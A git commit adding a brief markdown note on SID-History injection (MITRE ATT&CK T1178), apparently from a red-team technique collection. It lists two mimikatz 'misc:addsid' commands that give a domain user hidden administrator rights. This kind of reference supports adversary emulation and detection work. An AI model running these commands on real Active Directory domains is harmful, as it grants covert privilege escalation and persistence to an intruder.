Create SID_History_Injection.md

patch-4
rahmatnurfauzi 2018-01-26 07:25:32 +07:00 committed by GitHub
parent 3e7dda54bd
commit 814a210ec3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 0 deletions

View File

@ -0,0 +1,5 @@
# SID-History Injection
MITRE ATT&CK Technique: [T1178](https://attack.mitre.org/wiki/Technique/T1178)
## Create a new domain user. Hide admin privileges with SID history
`mimikatz "misc:addsid <user> <groups>"`
`mimikatz "misc:addsid eviluser ADSAdministrator"`